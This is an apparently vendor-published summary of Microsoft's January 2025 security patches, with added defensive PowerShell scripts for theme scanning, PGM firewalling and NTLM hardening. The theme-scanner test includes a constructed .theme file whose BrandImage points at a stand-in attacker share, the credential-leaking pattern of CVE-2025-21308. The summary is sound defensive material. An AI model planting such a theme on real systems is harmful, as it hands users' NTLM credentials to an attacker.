01/14/2025 | News release | Distributed by Public on 01/14/2025 22:29
Actively Exploited Zero-Day Vulnerabilities in Windows Hyper-V NT Kernel Integration VSP
Windows Hyper-V NT Kernel Integration VSP received patches for CVE-2025-21333, CVE-2025-21334 and CVE-2025-21335, all rated Important with a CVSS score of 7.8 and all exploited in the wild before the fix shipped. These elevation of privilege (EoP) vulnerabilities let an attacker who already has local code execution gain SYSTEM privileges, so they are post-compromise bugs that get chained after an initial foothold rather than an entry point in their own right. Microsoft has indicated the weaknesses are due to a heap-based buffer overflow but has not shared details of the vulnerabilities or the source of disclosure. Do not scope this to hypervisor hosts only: the kernel integration VSP is part of the Windows virtualization support and the affected products include client editions of Windows, not just Windows Server.
| Severity | CVSS Score | CVE | Description |
|---|---|---|---|
| Important | 7.8 | CVE-2025-21333 | Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege Vulnerability |
| Important | 7.8 | CVE-2025-21334 | Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege Vulnerability |
| Important | 7.8 | CVE-2025-21335 | Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege Vulnerability |
Publicly Disclosed Zero-Day Vulnerabilities in Microsoft Office Access, Windows App Package Installer and Windows Themes
Microsoft Office Access received patches for CVE-2025-21366, CVE-2025-21186 and CVE-2025-21395, all rated Important with a CVSS score of 7.8 and all publicly disclosed before the patch was available. These RCE vulnerabilities are triggered by opening a specially crafted Microsoft Access document, so exploitation depends on a user opening the file. In addition to patching the vulnerabilities, Microsoft has blocked certain potentially dangerous Access file extensions; that block narrows the delivery vector but is not a substitute for installing the update.
| Severity | CVSS Score | CVE | Description |
|---|---|---|---|
| Important | 7.8 | CVE-2025-21366 | Microsoft Access Remote Code Execution Vulnerability |
| Important | 7.8 | CVE-2025-21395 | Microsoft Access Remote Code Execution Vulnerability |
| Important | 7.8 | CVE-2025-21186 | Microsoft Access Remote Code Execution Vulnerability |
Windows App Package Installer received a patch for CVE-2025-21275, rated Important with a CVSS score of 7.8. This EoP vulnerability lets a local attacker who successfully exploits it gain SYSTEM privileges. Microsoft has indicated that the weakness is an improper authorization flaw but has not shared details of the vulnerability or the source of disclosure.
| Severity | CVSS Score | CVE | Description |
|---|---|---|---|
| Important | 7.8 | CVE-2025-21275 | Windows App Package Installer Elevation of Privilege Vulnerability |
Windows Themes received a patch for CVE-2025-21308, rated Important with a CVSS score of 6.5. This spoofing vulnerability is triggered by a specially crafted .theme file handled by Windows Explorer and can leak the user's NTLM credentials: when the theme's BrandImage or Wallpaper entry points at a network path, Windows connects to the remote host and authenticates to it automatically, handing the attacker's server an NTLM authentication exchange it can capture or relay. To exploit it, the attacker first has to get the crafted theme onto the target (for example as an attachment or download) and then have the user open or apply it. Microsoft's mitigation guidance is to disable NTLM where possible or to restrict outgoing NTLM traffic to remote servers, which stops the automatic authentication even if a crafted theme is opened.
| Severity | CVSS Score | CVE | Description |
|---|---|---|---|
| Important | 6.5 | CVE-2025-21308 | Windows Themes Spoofing Vulnerability |
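As an added example (not code from the original post), the PowerShell function below parses .theme files, which are plain INI text, and flags a BrandImage or Wallpaper entry that points at a remote host, which is the pattern the crafted theme in CVE-2025-21308 relies on. The sample theme is constructed, and the download and themes directories the final sweep walks are assumptions about where a delivered theme typically lands.

```powershell
# Added example (not from the original post): flag .theme files whose
# BrandImage or Wallpaper entry points at a remote host, the pattern the
# crafted theme in CVE-2025-21308 relies on. The sample theme is constructed.
function Find-RemoteThemePaths {
    param([Parameter(Mandatory)][string]$Path)

    $section  = ''
    $findings = @()
    foreach ($raw in (Get-Content -LiteralPath $Path)) {
        $line = $raw.Trim()
        if ($line -eq '' -or $line.StartsWith(';')) { continue }   # blank or comment
        if ($line -match '^\[(.+)\]$') { $section = $Matches[1]; continue }
        if ($line -match '^([^=]+)=(.*)$') {
            $key   = $Matches[1].Trim()
            $value = $Matches[2].Trim()

            # Explorer resolves these two entries when the theme is applied.
            $watched = ($section -eq 'Theme' -and $key -eq 'BrandImage') -or
                       ($section -eq 'Control Panel\Desktop' -and $key -eq 'Wallpaper')
            if (-not $watched) { continue }

            # A UNC path or URL makes the client connect out; over SMB or WebDAV
            # that connection carries an NTLM authentication attempt.
            if ($value -match '^\\\\[^\\]+\\' -or $value -match '^[A-Za-z][A-Za-z0-9+.-]*://') {
                $findings += [pscustomobject]@{
                    File = $Path; Section = $section; Key = $key; Value = $value
                }
            }
        }
    }
    return $findings
}

# Constructed sample: a benign local wallpaper plus a brand image on a remote share.
$sample = @'
; constructed Windows .theme file
[Theme]
DisplayName=Quarterly Report
BrandImage=\\attacker.example\share\brand.png

[Control Panel\Desktop]
Wallpaper=C:\Windows\Web\Wallpaper\Windows\img0.jpg
'@
$tmp = Join-Path $env:TEMP 'sample.theme'
Set-Content -LiteralPath $tmp -Value $sample
Find-RemoteThemePaths -Path $tmp | Format-Table -AutoSize

# Sweep the directories a delivered theme usually lands in (assumed locations).
$dirs = "$env:USERPROFILE\Downloads", "$env:APPDATA\Microsoft\Windows\Themes"
Get-ChildItem -Path $dirs -Filter *.theme -Recurse -ErrorAction SilentlyContinue |
    ForEach-Object { Find-RemoteThemePaths -Path $_.FullName }
```

Only the two keys Explorer resolves are checked; a theme that references a remote path elsewhere is not flagged, and .themepack/.deskthemepack files are CAB archives that would have to be extracted before their contained .theme can be scanned this way.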
Critical Vulnerability in Windows Reliable Multicast Transport Driver
CVE-2025-21307 is a Critical RCE vulnerability affecting the Windows Reliable Multicast Transport Driver (RMCAST) and has a CVSS score of 9.8. An unauthenticated attacker can exploit it by sending specially crafted packets to an open Windows Pragmatic General Multicast (PGM) socket on the server, with no user interaction. Exploitation is only possible if a program is actively listening as a PGM receiver; a host on which PGM is merely installed or enabled, with nothing listening, is not exploitable.
Since PGM does not authenticate requests, access to any PGM receiver has to be controlled at the network level, such as with a firewall. Note that PGM rides directly on IP as protocol number 113 rather than over TCP or UDP, so a firewall rule has to match on the IP protocol, not on a port number. A PGM receiver should never be exposed to the public internet.
| Severity | CVSS Score | CVE | Description |
|---|---|---|---|
| Critical | 9.8 | CVE-2025-21307 | Windows Reliable Multicast Transport Driver (RMCAST) Remote Code Execution Vulnerability |
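As an added example (not code from the original post), the PowerShell below checks whether the Reliable Multicast Protocol is bound on the host's adapters and fences inbound PGM at the Windows Firewall by IP protocol number. The firewall rule name is my own, and the `Internet` scope keyword is an assumption about what counts as non-local; replace it with the CIDR of the subnet that actually carries your multicast traffic if the keyword does not fit your network layout.

```powershell
# Added example (not from the original post): check whether the Reliable
# Multicast Protocol (PGM) is bound on this host and fence inbound PGM at the
# Windows Firewall. PGM rides directly on IP as protocol 113, so the rule
# matches the IP protocol number, not a TCP/UDP port. Rule name is mine.
$pgm = Get-NetAdapterBinding |
    Where-Object { $_.DisplayName -like 'Reliable Multicast*' -and $_.Enabled }

if (-not $pgm) {
    'PGM is not bound on any adapter: no receiver can listen here.'
} else {
    'PGM is bound on:'
    $pgm | Format-Table Name, DisplayName, ComponentID -AutoSize
    # If nothing on this host needs to receive PGM, unbinding it removes the
    # attack surface entirely (elevated session required):
    # $pgm | Disable-NetAdapterBinding
}

# PGM carries no authentication, so keep it reachable only from the subnet
# where senders and receivers live, regardless of patch status.
$ruleName = 'Block inbound PGM (IP protocol 113) from non-local addresses'
if (-not (Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue)) {
    New-NetFirewallRule -DisplayName $ruleName -Direction Inbound -Protocol 113 `
        -RemoteAddress Internet -Action Block -Profile Any | Out-Null   # scope is an assumption
}
# Confirm the rule matches the protocol number rather than a port.
Get-NetFirewallRule -DisplayName $ruleName | Get-NetFirewallPortFilter
```

Run this on each host that has the multicast stack bound; on a host that does not need to receive PGM at all, unbinding the protocol is the cleaner fix than relying on the firewall rule.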
Critical Vulnerability in Windows OLE
CVE-2025-21298 is a Critical RCE vulnerability with a CVSS score of 9.8 affecting Windows OLE (Object Linking and Embedding), the technology that lets documents embed and link to other documents and objects. In an email attack scenario, an attacker sends a specially crafted email to the victim. Exploitation does not require the victim to open the message deliberately: either opening it in an affected version of Microsoft Outlook or having Outlook render it in the Preview Pane is enough, which is what makes this bug worth prioritizing. A successful attack gives the attacker remote code execution on the victim's machine.
| Severity | CVSS Score | CVE | Description |
|---|---|---|---|
| Critical | 9.8 | CVE-2025-21298 | Windows OLE Remote Code Execution Vulnerability |
Critical Vulnerability in Windows NTLMv1
CVE-2025-21311 is a Critical elevation of privilege vulnerability affecting Windows NTLMv1 and has a CVSS score of 9.8. NTLMv1 and NTLMv2 are two versions of the NTLM (NT LAN Manager) authentication protocol used in Windows environments; NTLMv1 is the older and cryptographically weaker of the two. This vulnerability is exploitable over the network, including from the internet, and its low attack complexity means an attacker needs minimal knowledge of the target and can succeed reliably against the vulnerable component. To mitigate, set LmCompatibilityLevel to its maximum value (5) on all machines, which refuses LM and NTLMv1 while retaining NTLMv2. Anything that still speaks only NTLMv1 (older NAS appliances, printers, embedded devices) will stop authenticating once that is in place, so check the NTLM operational log for NTLMv1 use before rolling the change out fleet-wide.
| Severity | CVSS Score | CVE | Description |
|---|---|---|---|
| Critical | 9.8 | CVE-2025-21311 | Windows NTLMv1 Elevation of Privilege Vulnerability |
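As an added example (not code from the original post), the PowerShell below audits and applies the two NTLM mitigations this post mentions: LmCompatibilityLevel=5 for the NTLMv1 vulnerability above, and the "restrict outgoing NTLM traffic to remote servers" setting given as a mitigation for the Windows Themes spoofing bug (CVE-2025-21308) earlier in this post. These are the registry values behind the corresponding Group Policy settings; on domain-joined hosts, policy will overwrite them, so set them through GPO there. The allowed-server hostname is a placeholder.

```powershell
# Added example (not from the original post): audit and apply the two NTLM
# mitigations the text describes. Run in an elevated session. These are the
# registry values behind the Group Policy settings; GPO overwrites them on
# domain-joined hosts, so prefer GPO there.
$lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$msv = "$lsa\MSV1_0"

function Get-NtlmPosture {
    # Values absent from the registry read back as $null (policy default applies).
    $lm  = Get-ItemProperty -Path $lsa -Name LmCompatibilityLevel       -ErrorAction SilentlyContinue
    $out = Get-ItemProperty -Path $msv -Name RestrictSendingNTLMTraffic -ErrorAction SilentlyContinue
    $exc = Get-ItemProperty -Path $msv -Name ClientAllowedNTLMServers   -ErrorAction SilentlyContinue
    [pscustomobject]@{
        LmCompatibilityLevel       = $lm.LmCompatibilityLevel
        RestrictSendingNTLMTraffic = $out.RestrictSendingNTLMTraffic
        ClientAllowedNTLMServers   = ($exc.ClientAllowedNTLMServers -join ', ')
    }
}

'Before:'; Get-NtlmPosture

# CVE-2025-21311: 5 = send NTLMv2 only, refuse LM and NTLMv1 (the maximum of
# "Network security: LAN Manager authentication level"). Anything that only
# speaks NTLMv1 stops authenticating, so audit first.
Set-ItemProperty -Path $lsa -Name LmCompatibilityLevel -Type DWord -Value 5

# CVE-2025-21308 mitigation: "Restrict NTLM: Outgoing NTLM traffic to remote
# servers". 1 = audit only (logs event 8001 in Microsoft-Windows-NTLM/Operational),
# 2 = deny all. Start at 1, review the audit events, then move to 2.
Set-ItemProperty -Path $msv -Name RestrictSendingNTLMTraffic -Type DWord -Value 1

# Servers that legitimately still need NTLM from this client (placeholder name).
Set-ItemProperty -Path $msv -Name ClientAllowedNTLMServers -Type MultiString -Value @('fs01.corp.example')

'After:'; Get-NtlmPosture

# Which remote hosts this client attempted NTLM against while auditing:
# a crafted theme would show up here as an attempt to the attacker's host.
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-NTLM/Operational'; Id = 8001 } `
    -MaxEvents 20 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Message
```

The audit-first value (1) is deliberate: moving straight to deny (2) on a fleet that still has NTLM-only file servers breaks access before anyone has seen which hosts need an exception.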
Two Critical Vulnerabilities in Windows Remote Desktop Services
CVE-2025-21309 and CVE-2025-21297 are Critical RCE vulnerabilities affecting Windows Remote Desktop Services and have a CVSS score of 8.1. Exploiting either requires winning a race condition, which is what keeps the score below the usual 9.8 for unauthenticated network RCE: the attacker connects to a system running the Remote Desktop Gateway role and times their requests so that the race produces a use-after-free. A successful attempt gives arbitrary code execution on the gateway. Because RD Gateway is by design exposed to the internet, treat these as high priority despite the higher attack complexity.
| Severity | CVSS Score | CVE | Description |
|---|---|---|---|
| Critical | 8.1 | CVE-2025-21309 | Windows Remote Desktop Services Remote Code Execution Vulnerability |
| Critical | 8.1 | CVE-2025-21297 | Windows Remote Desktop Services Remote Code Execution Vulnerability |
Critical Vulnerability in Microsoft Digest Authentication
CVE-2025-21294 is a Critical RCE vulnerability affecting Microsoft Digest Authentication and has a CVSS score of 8.1. As with the Remote Desktop Services bugs, exploitation hinges on winning a race condition: the attacker connects to a system that requires digest authentication and times the exchange so that a use-after-free occurs. A successful attempt allows the attacker to execute arbitrary code on the target system.
| Severity | CVSS Score | CVE | Description |
|---|---|---|---|
| Critical | 8.1 | CVE-2025-21294 | Microsoft Digest Authentication Remote Code Execution Vulnerability |
Critical Vulnerability in SPNEGO Extended Negotiation (NEGOEX) Security Mechanism
CVE-2025-21295 is a Critical RCE vulnerability affecting the SPNEGO (Simple and Protected GSSAPI Negotiation Mechanism) Extended Negotiation (NEGOEX) Security Mechanism and has a CVSS score of 8.1. NEGOEX lets a client and server securely negotiate which authentication protocol to use. It is commonly encountered in web-based authentication, in particular between Internet Explorer and IIS (Internet Information Services), but the negotiation code runs wherever Windows authentication is accepted, so the exposure is not limited to web servers.
Microsoft has only said that exploitation requires the attacker to manipulate system operations in a specific way. If successful, the attacker can execute code remotely on the target without any user interaction, potentially gaining control of the affected device.
| Severity | CVSS Score | CVE | Description |
|---|---|---|---|
| Critical | 8.1 | CVE-2025-21295 | SPNEGO NEGOEX Security Mechanism Remote Code Execution Vulnerability |
Two Critical Vulnerabilities in Microsoft Excel
CVE-2025-21354 and CVE-2025-21362 are Critical RCE vulnerabilities affecting Microsoft Excel and have a CVSS score of 7.8. Microsoft has indicated that the weakness is an untrusted pointer dereference but has not shared details. The attack vector is the Preview Pane, so a user does not have to open a crafted workbook for it to be processed; we have seen the same vector many times in earlier vulnerabilities (April 2023, July 2023, December 2023, October 2024).
| Severity | CVSS Score | CVE | Description |
|---|---|---|---|
| Critical | 7.8 | CVE-2025-21354 | Microsoft Excel Remote Code Execution Vulnerability |
| Critical | 7.8 | CVE-2025-21362 | Microsoft Excel Remote Code Execution Vulnerability |
Critical Vulnerability in BranchCache
CVE-2025-21296 is a Critical RCE vulnerability affecting BranchCache and has a CVSS score of 7.5. BranchCache is a Windows feature that caches content from central servers on clients or a hosted cache in a branch office to reduce WAN traffic. The vulnerability has high attack complexity: successful exploitation requires the attacker to win a race condition. The attack vector is adjacent, meaning the attacker must already be on the same network segment as the target (the same switch, VLAN or virtual network); it cannot be exploited across routed networks or from the internet.
| Severity | CVSS Score | CVE | Description |
|---|---|---|---|
| Critical | 7.5 | CVE-2025-21296 | BranchCache Remote Code Execution Vulnerability |
Not All Relevant Vulnerabilities Have Patches: Consider Mitigation Strategies
As we have learned with other notable vulnerabilities, such as Log4j, not every highly exploitable vulnerability can be patched quickly. As was the case for the ProxyNotShell vulnerabilities, it is critically important to have a response plan for defending your environment when no patch is yet available.
Regular review of your patching strategy should remain part of your program, but you should also look more holistically at your organization's security practices and work to improve your overall security posture.
The CrowdStrike Falcon platform regularly collects and analyzes trillions of endpoint events every day from millions of sensors deployed across 176 countries. Watch this demo to see the Falcon platform in action.
Learn More
Learn more about how CrowdStrike Falcon® Exposure Management can help you quickly and easily discover and prioritize vulnerabilities and other types of exposures here.
About CVSS Scores
The Common Vulnerability Scoring System (CVSS) is a free and open industry standard that CrowdStrike and many other cybersecurity organizations use to assess and communicate software vulnerabilities' severity and characteristics. The CVSS Base Score ranges from 0.0 to 10.0, and the National Vulnerability Database (NVD) adds a severity rating for CVSS scores. Learn more about vulnerability scoring in this article.
Additional Resources